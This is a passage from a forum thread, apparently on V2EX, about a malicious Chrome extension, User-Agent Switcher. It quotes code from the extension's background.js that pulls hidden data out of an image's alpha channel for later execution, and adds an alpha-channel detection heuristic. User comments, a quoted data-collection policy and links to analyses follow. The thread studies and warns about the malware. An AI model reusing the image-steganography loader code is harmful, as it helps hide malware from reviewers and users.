https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
Line 80 of background.js decrypts malicious code out of this image and executes it:
t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
People are also discussing this issue here: https://news.ycombinator.com/item?id=14889619
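
For anyone auditing an extension's bundled images, the following is an added example, not part of the original post or of the extension's code: a heuristic that flags an image whose alpha channel looks like the data carrier the decoder above reads (every fourth byte starting at index 3, minus a base close to 255). The function names, the `bitsPerPixel` and `minCarrierPixels` values, the assumption that the base is 256 - 2^bitsPerPixel, and the sample pixel arrays are all constructed for illustration; the real parameters come from configuration that is not shown in the thread.

```javascript
// Added example: alpha-channel carrier heuristic (not the extension's code).
// rgba is a flat RGBA byte array, e.g. ctx.getImageData(0, 0, w, h).data in a browser.
function alphaChannelReport(rgba, bitsPerPixel = 2, minCarrierPixels = 16) {
  // Assumption: carrier pixels keep alpha in [256 - 2^bits, 255] so the image
  // still looks fully opaque while the low bits of alpha hold data.
  const base = 256 - Math.pow(2, bitsPerPixel);
  const histogram = new Map();
  let nonOpaque = 0; // pixels with alpha != 255
  let belowBand = 0; // pixels with real, visible transparency
  for (let i = 3; i < rgba.length; i += 4) {
    const a = rgba[i];
    histogram.set(a, (histogram.get(a) || 0) + 1);
    if (a !== 255) nonOpaque += 1;
    if (a < base) belowBand += 1;
  }
  // Suspicious: nothing is visibly transparent, yet many pixels deviate from
  // 255 inside the narrow band, and the alpha values are not constant.
  const suspicious =
    belowBand === 0 && nonOpaque >= minCarrierPixels && histogram.size > 1;
  return {
    pixels: Math.floor(rgba.length / 4),
    nonOpaque,
    belowBand,
    distinctAlpha: histogram.size,
    suspicious,
  };
}

// Constructed sample data: builds an RGBA buffer with a chosen alpha per pixel.
function makeRgba(pixelCount, alphaAt) {
  const data = new Uint8ClampedArray(pixelCount * 4);
  for (let p = 0; p < pixelCount; p += 1) {
    data.set([120, 130, 140, alphaAt(p)], p * 4);
  }
  return data;
}

const opaque = makeRgba(64, () => 255);                     // ordinary opaque image
const carrier = makeRgba(64, (p) => 252 + ((p * 7) % 4));   // alpha confined to 252..255
const gradient = makeRgba(64, (p) => p * 4);                // genuine transparency, 0..252

for (const [name, data] of [["opaque", opaque], ["carrier", carrier], ["gradient", gradient]]) {
  console.log(name, alphaChannelReport(data));
}
```

JPEG has no alpha channel, so a file with a .jpg name that decodes with varying alpha values deserves a closer look regardless of the thresholds used here.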

101 chanssl 2017-09-10 20:09:20 +08:00
Damn, it actually turned out to be malware. I got hit.

102 Bailang 2017-09-10 21:15:38 +08:00

103 chroming 2017-09-10 22:54:44 +08:00
Just realized that someone already found problems with this extension last year: https://www.v2ex.com/t/263719

104 Bailang 2017-09-11 09:52:04 +08:00
Reposted; will remove on request if infringing. https://x.threatbook.cn/article?threatInfoID=113
Someone posted this policy:
Collected Information. Accessing and Using the Services. When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users.

105 nyanyh 2017-09-11 11:52:12 +08:00
@acess omg... I'm still using Better History. Sometimes in Surge I see random, weird domain names like dwoqpurpfdjksla.lan, and I don't know whether this extension is behind them.

107 cyg07 2017-09-20 19:10:53 +08:00
@redsonic @anoymoux @xssnull 360CERT's detailed analysis, "Chrome Extension User – Agent Switcher Malicious Code Analysis Report": http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw

108 ariza 2017-09-22 10:23:32 +08:00
Why on earth is it still standing...

110 lyragosa 2017-10-18 23:32:49 +08:00
This seems to be exactly the extension I have... It scared me into deleting it right away.

112 O5QQvmS5L8WH5poy 2020-09-05 20:48:27 +08:00
It has been taken down.